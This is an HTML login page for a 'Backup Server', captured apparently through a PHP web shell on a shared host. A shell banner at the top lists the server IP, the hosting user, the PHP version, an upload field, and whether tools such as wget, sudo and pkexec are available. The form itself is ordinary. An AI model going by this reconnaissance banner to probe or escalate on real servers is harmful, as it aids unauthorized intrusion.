| Server IP : 103.73.189.18 / Your IP : 216.73.217.70 Web Server : Apache System : Linux ind1.webspacekit.com 4.18.0-553.137.1.lve.el8.x86_64 #1 SMP Tue Jun 23 21:01:50 UTC 2026 x86_64 User : sarahwil ( 1617) PHP Version : 8.1.34 Disable Function : mail MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : / |
Upload File : |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login - Backup Server</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 20px;
}
.login-container {
background: white;
border-radius: 20px;
box-shadow: 0 20px 60px rgba(0,0,0,0.3);
padding: 50px;
width: 100%;
max-width: 420px;
animation: slideUp 0.5s ease;
}
@keyframes slideUp {
from {
opacity: 0;
transform: translateY(30px);
}
to {
opacity: 1;
transform: translateY(0);
}
}
.login-header {
text-align: center;
margin-bottom: 40px;
}
.login-icon {
font-size: 64px;
margin-bottom: 20px;
}
.login-title {
font-size: 28px;
font-weight: 700;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
margin-bottom: 10px;
}
.login-subtitle {
color: #666;
font-size: 14px;
}
.form-group {
margin-bottom: 25px;
}
.form-label {
display: block;
margin-bottom: 8px;
color: #333;
font-weight: 500;
font-size: 14px;
}
.form-input {
width: 100%;
padding: 14px 18px;
border: 2px solid #e0e0e0;
border-radius: 12px;
font-size: 15px;
transition: all 0.3s ease;
background: #f8f9fa;
}
.form-input:focus {
outline: none;
border-color: #667eea;
background: white;
box-shadow: 0 0 0 3px rgba(102, 126, 234, 0.1);
}
.login-button {
width: 100%;
padding: 14px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
border: none;
border-radius: 12px;
color: white;
font-size: 16px;
font-weight: 600;
cursor: pointer;
transition: all 0.3s ease;
margin-top: 10px;
}
.login-button:hover {
transform: translateY(-2px);
box-shadow: 0 10px 25px rgba(102, 126, 234, 0.4);
}
.login-button:active {
transform: translateY(0);
}
.error-message {
background: #fee;
border: 2px solid #fcc;
color: #c33;
padding: 12px 18px;
border-radius: 10px;
margin-bottom: 20px;
font-size: 14px;
text-align: center;
animation: shake 0.5s;
}
@keyframes shake {
0%, 100% { transform: translateX(0); }
25% { transform: translateX(-10px); }
75% { transform: translateX(10px); }
}
.info-box {
background: #f0f2ff;
border: 2px solid #d0d5ff;
color: #667eea;
padding: 12px 18px;
border-radius: 10px;
margin-top: 20px;
font-size: 13px;
text-align: center;
}
</style>
</head>
<body>
<div class="login-container">
<div class="login-header">
<div class="login-icon">🔒</div>
<h1 class="login-title">Backup Server</h1>
<p class="login-subtitle">Sign in to access backup files</p>
</div>
<form method="POST" action="/login">
<div class="form-group">
<label class="form-label">Username</label>
<input type="text" name="username" class="form-input" required autofocus>
</div>
<div class="form-group">
<label class="form-label">Password</label>
<input type="password" name="password" class="form-input" required>
</div>
<button type="submit" class="login-button">Sign In</button>
</form>
<div class="info-box">
🔐 Secure connection
</div>
</div>
</body>
</html>